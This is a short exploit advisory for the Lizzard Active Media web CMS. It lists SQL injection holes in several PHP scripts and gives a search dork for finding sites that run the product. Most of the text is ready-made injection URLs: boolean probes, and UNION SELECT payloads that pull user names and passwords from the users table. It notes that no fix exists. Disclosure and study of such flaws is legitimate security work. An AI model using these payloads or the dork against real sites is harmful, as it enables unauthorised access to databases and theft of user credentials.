Lizzard Active Media Multiple SQL Injection Vulnerabilities

2010-05-25 09:46:06

-------------------------------------------------------------------------------------------

Lizzard Active Media Multiple SQL Injection Vulnerabilities:
newsdetail.php
progvisitors.php
actdetail.php

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Script Home: http://www.lizzard.gr/

Dork: powered by Lizzard Active Media

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/progvisitors.php?ptype=1/**/and/**/1=2

http://localhost/[path]/progvisitors.php?ptype=1/**/and/**/1=1

http://localhost/[path]/pressdetail.php?lang=&prs_id=61/**/union/**/select/**/0,1,2,group_concat(name,0x3a,password),4,5,6,7/**/from/**/users

http://localhost/[path]/actdetail.php?prg_id=-21/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(name,0x3a,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/**/from/**/users

-------------------------------------------------------------------------------------------

Fixes

No fixes

In order to submit a new fix you need to be registered.